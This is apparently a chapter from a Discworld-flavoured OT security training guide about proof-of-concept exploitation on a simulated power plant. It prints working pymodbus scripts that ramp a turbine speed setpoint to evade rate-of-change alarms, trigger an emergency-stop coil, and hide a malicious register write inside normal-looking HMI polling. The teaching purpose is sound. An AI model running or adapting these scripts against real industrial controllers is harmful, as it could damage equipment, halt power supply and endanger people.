Proof of concept exploits: Demonstrating impact without destruction

Or: How Ponder showed what could happen without actually making it happen

The delicate balance

The Patrician has a saying about demonstrations of power: the most effective demonstration is the one you never quite have to perform. The credible threat of action is often more valuable than the action itself, particularly when the action in question might accidentally shut down half the city’s power supply or turn a turbine into an unscheduled disassembly event.

Proof of concept development in OT security, Ponder discovered, is the art of proving you could do something catastrophic without actually doing it. This is rather more important in OT than in IT. In IT penetration testing, you might actually exfiltrate data (with permission) or actually compromise systems (in a controlled way) to prove impact. In OT, “actually demonstrating” that you can shut down turbines by shutting down turbines is the sort of thing that gets people hurt, gets you arrested, and gets the entire concept of security testing banned from the facility.

The challenge is demonstrating sufficient proof that stakeholders take findings seriously, without demonstrating so much proof that you cause actual harm.

The simulator’s exploitation scripts

The UU P&L simulator provided a safe environment where Ponder could demonstrate actual exploitation without risking actual infrastructure. The exploitation scripts in scripts/exploitation/ showed what attacks could do:

Turbine overspeed attack

turbine_overspeed_attack.py

This script demonstrated a gradual overspeed attack against the turbine controller. Instead of immediately setting dangerous speeds (which would trigger safety systems), it incrementally increased the speed setpoint over time:

# Gradual overspeed - harder to detect
for new_speed in range(current_speed, target_speed, step_size):
    client.write_register(SPEED_SETPOINT, new_speed)
    time.sleep(delay_between_steps)
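
On its own, that excerpt leaves out the connection setup. A minimal self-contained sketch of the same ramp against the simulator might look like the following, assuming a pymodbus client; the host, register address, target speed, and step parameters are illustrative rather than the script’s actual configuration:

# Illustrative reconstruction - not the actual turbine_overspeed_attack.py.
# Assumes the speed setpoint is exposed as a Modbus holding register.
import time
from pymodbus.client import ModbusTcpClient   # pymodbus 3.x

SIMULATOR_HOST = "127.0.0.1"   # simulator only - never point this at a production PLC
SPEED_SETPOINT = 0             # hypothetical holding-register address
TARGET_SPEED = 3900            # illustrative overspeed target
STEP_SIZE = 10                 # small increments to stay under rate-of-change alarms
STEP_DELAY = 5.0               # seconds between writes

client = ModbusTcpClient(SIMULATOR_HOST, port=502)
client.connect()

# Start the ramp from the value the controller is already using.
current = client.read_holding_registers(SPEED_SETPOINT, count=1).registers[0]

for new_speed in range(current, TARGET_SPEED, STEP_SIZE):
    client.write_register(SPEED_SETPOINT, new_speed)   # unauthenticated Modbus write
    time.sleep(STEP_DELAY)

client.close()

Starting from the current setpoint matters: each individual write then looks like a plausible small adjustment rather than an abrupt jump.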

What it demonstrates:

  • Unauthenticated Modbus write access

  • Ability to modify physical process parameters

  • Techniques for evading rate-of-change detection

  • How gradual attacks can be harder to detect than sudden ones

Impact: In a real system, turbine overspeed can cause mechanical failure or catastrophic disassembly, or trip emergency shutdown systems. The simulator shows this is technically possible without actually destroying a turbine.

Emergency stop attack

turbine_emergency_stop.py

This script demonstrated triggering emergency stops via Modbus:

# Trigger emergency stop via coil write
client.write_coil(EMERGENCY_STOP_COIL, True)
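
A self-contained version needs little more than a connection and that single coil write. The sketch below is illustrative, again assuming a pymodbus client against the simulator; the coil address is hypothetical:

# Illustrative sketch - not the actual turbine_emergency_stop.py.
from pymodbus.client import ModbusTcpClient   # pymodbus 3.x

SIMULATOR_HOST = "127.0.0.1"   # simulator only
EMERGENCY_STOP_COIL = 10       # hypothetical coil address

client = ModbusTcpClient(SIMULATOR_HOST, port=502)
client.connect()

# Trigger the emergency stop via an unauthenticated coil write.
client.write_coil(EMERGENCY_STOP_COIL, True)

# Read the coil back to confirm the stop latched.
stopped = client.read_coils(EMERGENCY_STOP_COIL, count=1).bits[0]
print(f"Emergency stop coil set: {stopped}")

client.close()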

What it demonstrates:

  • Ability to trigger safety systems remotely

  • Denial of service through emergency shutdowns

  • How easily critical controls can be activated

Impact: Emergency stops cause immediate production loss, potential equipment damage from the rapid shutdown, and the need to test and recalibrate safety systems before restart. The simulator demonstrates the vulnerability without causing actual downtime.

Protocol camouflage

protocol_camouflage.py

This script demonstrated hiding malicious commands within legitimate-looking protocol traffic.
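
The script itself isn’t reproduced here, but the core idea can be sketched: wrap the hostile write inside the same polling pattern, cadence, and addressing that a legitimate HMI uses, so that at the protocol level the malicious frame is indistinguishable from routine traffic. The sketch below illustrates that idea with a pymodbus client; the addresses, polling interval, and written value are assumptions, not the script’s actual parameters:

# Illustrative camouflage sketch - blend one malicious write into normal-looking polling.
import random
import time
from pymodbus.client import ModbusTcpClient   # pymodbus 3.x

SIMULATOR_HOST = "127.0.0.1"   # simulator only
STATUS_BLOCK = 0               # hypothetical registers an HMI would poll
SPEED_SETPOINT = 20            # hypothetical target register
POLL_INTERVAL = 2.0            # match the legitimate HMI's polling cadence

client = ModbusTcpClient(SIMULATOR_HOST, port=502)
client.connect()

for cycle in range(30):
    # Normal-looking traffic: the same reads an HMI issues all day long.
    client.read_holding_registers(STATUS_BLOCK, count=10)

    # One hostile write, slipped into a single cycle at the usual cadence.
    if cycle == 15:
        client.write_register(SPEED_SETPOINT, 3600)   # illustrative value

    time.sleep(POLL_INTERVAL + random.uniform(-0.1, 0.1))   # jitter like real traffic

client.close()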

What it demonstrates:

  • How to craft attacks that look like normal operations

  • Techniques for evading signature-based detection

  • The difficulty of distinguishing malicious from legitimate traffic

Impact: Shows that network monitoring alone isn’t sufficient if attackers can make their traffic appear legitimate.

Other exploitation demonstrations

The simulator includes additional exploitation scripts demonstrating further attack techniques, all of which follow the safety boundaries described below.

Safe exploitation boundaries

The simulator enforces safe testing by design:

Green (safe in simulator):

  • All reconnaissance scripts (read-only protocol access)

  • All vulnerability assessment scripts (enumerate but don’t modify)

  • Exploitation scripts against simulator (no real equipment at risk)

  • Detection testing (generate suspicious traffic safely)

Amber (caution even in simulator):

  • Scripts that modify simulator state (overspeed, emergency stop)

  • High-volume scanning (could affect simulator performance)

  • Tests that trigger multiple alarm conditions

Red (never on production):

  • Any exploitation script against real equipment

  • Any script that writes to production PLCs

  • Any testing that could affect physical processes

The simulator lets you practise in Green, understand the risks of Amber, and learn why Red requires extreme caution.

Read-only demonstrations

Before running exploitation scripts, Ponder’s approach was always to demonstrate impact through read-only reconnaissance:

What can be read: register values, process setpoints, alarm thresholds and safety limits, and the PLC program blocks that encode control algorithms.

Impact demonstrated:

  • Intellectual property theft (control algorithms)

  • Operational intelligence (production rates, setpoints)

  • Attack planning (understanding system behaviour)

  • Safety information disclosure (alarm thresholds, safety limits)

Often, demonstrating read access was sufficient to prove that write access would also be possible. If you can read a Modbus holding register over an unauthenticated connection, that same connection lets you write to it. If you can upload PLC program blocks from a controller, you could download modified blocks back to it. The simulator makes these connections explicit.
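
A read-only pass of that kind takes only a few lines. The sketch below is illustrative, assuming a pymodbus client against the simulator; the register map is invented for the example and is not the simulator’s actual layout:

# Illustrative read-only reconnaissance - no writes, no state changes.
from pymodbus.client import ModbusTcpClient   # pymodbus 3.x

SIMULATOR_HOST = "127.0.0.1"   # simulator only

# Hypothetical register map, used purely for illustration.
POINTS = {
    "speed_setpoint": 0,
    "speed_actual": 1,
    "alarm_threshold": 2,
}

client = ModbusTcpClient(SIMULATOR_HOST, port=502)
client.connect()

for name, address in POINTS.items():
    response = client.read_holding_registers(address, count=1)
    if not response.isError():
        print(f"{name:>16}: {response.registers[0]}")

client.close()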

Testing on the simulator

The simulator provides several advantages for PoC development:

No physical consequences: Overspeed attacks don’t destroy real turbines. Emergency stops don’t cause actual downtime.

Repeatable testing: Reset and test again. Iterate on attack techniques without risk.

Full observability: See exactly what the attack does to PLC memory, register values, and system state.

Safe learning environment: Understand attack mechanics before dealing with real systems.

Documentation: Scripts demonstrate attack techniques with actual code, not just descriptions.

Ponder’s approach to PoC development

Ponder’s testing journal documented his methodology:

“Start with reconnaissance. Show what you can read. If you can read everything, stakeholders usually understand that writing is possible too.

“If read access isn’t convincing enough, demonstrate on the simulator. Show the attack working. Screen recording, saved output, detailed logs. Make it clear this is the simulator, not production.

“Never demonstrate write attacks on production unless:

  1. You have explicit written approval

  2. The system is in a safe state

  3. Someone can physically intervene

  4. You have verified rollback procedures

  5. You understand the physical consequences

“And even then, consider whether a simulator demonstration would be sufficient. Usually it is.

“The goal is to prove risk, not to create incidents. The simulator lets us do the former without the latter.”

Script output and documentation

All exploitation scripts save detailed output to reports/:

reports/
├── turbine_overspeed_20260204_141523.json
├── emergency_stop_20260204_142011.json
├── protocol_camouflage_20260204_143045.json
└── ...

Each report includes:

  • Timestamp and target information

  • Attack parameters and configuration

  • Observed responses from targets

  • Success/failure indicators

  • Security implications

These reports demonstrate impact without requiring stakeholders to understand the technical details of how Modbus function codes work or what S7 memory areas are.
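
The fields above map naturally onto a small JSON document. A minimal sketch of how a script might write such a report is shown below; the file naming follows the pattern in the reports/ listing, but the exact schema is an assumption rather than the scripts’ actual format:

# Illustrative report writer - the real scripts' schema may differ.
import json
from datetime import datetime
from pathlib import Path

def save_report(attack_name, target, parameters, observations, success, implications):
    """Write a timestamped JSON report following the reports/ naming pattern."""
    timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
    report = {
        "timestamp": timestamp,
        "target": target,                    # host, port, and unit information
        "attack": attack_name,
        "parameters": parameters,            # attack configuration used
        "observed_responses": observations,
        "success": success,
        "security_implications": implications,
    }
    path = Path("reports") / f"{attack_name}_{timestamp}.json"
    path.parent.mkdir(exist_ok=True)
    path.write_text(json.dumps(report, indent=2))
    return path

# Example call with illustrative values:
# save_report("turbine_overspeed", {"host": "127.0.0.1", "port": 502},
#             {"target_speed": 3900, "step": 10}, ["setpoint write accepted"],
#             True, ["Unauthenticated writes change physical process parameters"])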

The educational value

The exploitation scripts teach several lessons:

Attacks are often simple: No zero-days required. Just unauthenticated protocols and basic commands.

Impact is physical: These aren’t just network exploits. They affect real-world processes.

Detection is difficult: Malicious commands look exactly like legitimate commands.

Defence requires depth: Protocol security alone isn’t sufficient.

The simulator demonstrates these lessons safely, preparing security professionals for real OT environments where mistakes have physical consequences.

The exploitation scripts demonstrate real attack capabilities in a safe environment, teaching both offensive and defensive OT security principles.